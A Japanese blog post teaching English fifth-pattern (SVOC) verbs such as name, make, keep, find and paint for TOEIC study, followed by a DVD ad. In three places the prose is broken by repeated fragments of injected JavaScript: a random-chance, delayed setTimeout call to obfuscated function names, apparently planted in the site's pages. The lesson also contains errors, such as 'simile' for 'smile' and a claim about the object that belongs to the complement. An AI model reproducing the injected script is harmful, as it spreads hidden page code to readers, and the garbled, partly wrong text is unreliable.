要チェック!第5文型で使われる動詞でよく出るもの!特徴はO=C

みなさんこんにちは。英文法勉強中の桃太郎です。

TOEICでは第5文型andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}に関しての問題がよく出てきます。第5文型とは、「S+V+O+C」(主語+動詞+目的語+補語)の形をした文のことです。

We call him Bob.
(S + V + O + C)

上の文では、彼(O) = Bob(C)andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}が成り立っていますね。これが第5文型の特徴です。目的語(O)には名詞の他に、名詞句、形容詞、形容詞句の他、不定詞、現在分詞、過去分詞などいろいろ使われます。

今回は第5文型でよく使われる動詞をまとめてみました。ぜひ抑えておきましょう!

 

第5文型動詞でよく出るもの

name O C 「OをCと名づける」

I named the dog Ken.
(僕はその犬にケンと名付けた。)

make O C 「OをC(の状態)にする」

Her simile made me happy.
(彼女の意見が僕を幸せにした。)

keep O C 「OをC(の状態)に保つ」

His hard-work kept me motivated.
(彼のハードワークが僕のモチベーションをキープした。)

think O C「Oを(が)Cだと思う」

I think Arisa kind.
(僕はアリサが親切だと思う。)

find O C 「OがCだと気づく(分かる)」

I found ABC the worst city I’ve ever had.
(僕はABCが今までで最悪の都市だと知った。)

believe O C 「OがCだと信じる」

I believe her honest.
(僕は彼女は正直だと信じてる。)

elect O C 「OをCに選ぶ」

We elected her captain.
(僕らは彼女をキャプテンに選んだ)

leave O C 「OをCのままにする」

Don’t leave the light on.
(電気をついたままにしてはいけません。)

paint O C 「OをCに塗る」

He painted the wall green.
(彼は壁を緑色に塗った。)

dye O C 「OをCに染める」

She dyed her hair brown.
(彼女は髪を茶色に染めた。)

wash O C 「OをCに洗う」

I washed the dish clean.
(私は皿を綺麗に洗った。)

 

さいごに

第5文型は基本的に、「C」の場所に名詞か形容詞がくることが多いです。しかし、まれに動詞がくることもできます。使役動詞andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}や原形不定詞が使われている時です。それらについては次回以降の記事でご紹介したいと思いますので、ぜひお楽しみに!

book-image
 

TOEIC文法に特化した教材がここに!

3時間レッスンを驚き価格でご提供!

有名先生のリアル授業をDVDでお届け!

3時間の40レッスンのDVD教材がたったの1,800円!(税抜き)

購入はこちら! 購入はこちら!

この記事を書いた人

桃太郎

桃太郎

このサイトの管理人であり、モモセ先生のDVDで英文法を勉強中の桃太郎です。過去カナダに2年間在住していたことがありますが、『文法なんて別にどうでもいいでしょ!』と英文法を完全になめきっていました......このブログでは英文法をいま一度学び直している僕が、気づいたことや大事だと思ったことなどをみなさんにシェアしていきます。

桃太郎が書いた記事一覧はこちら

Facebookコメント